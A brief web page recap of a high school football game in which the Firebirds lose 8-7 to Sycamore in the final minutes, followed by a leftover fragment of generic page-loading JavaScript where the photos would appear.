Football
The Firebirds Fall 8-7 to Sycamore in the Final Seconds.
Summary by Bob Ashby:
Silas Walters intercepted an Aviator pass deep in West territory in the first quarter. This led to a sustained Firebird drive ending with a David Afari 28 yard TD run followed by a Nick Hjort extra-point kick to give West a 7-0 lead with 1:23 remaining in the first quarter. With less than 2.5 minutes remaining in the final stanza, Sycamore was able to force a Firebird fumble which the Aves recovered in West territory. Sycamore then scored a TD and added a two-point conversion to eke out the win. Isaac Koloski led the Firebirds with 8 tackles (7 solos).
Pics by Lou Spinazzola:
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();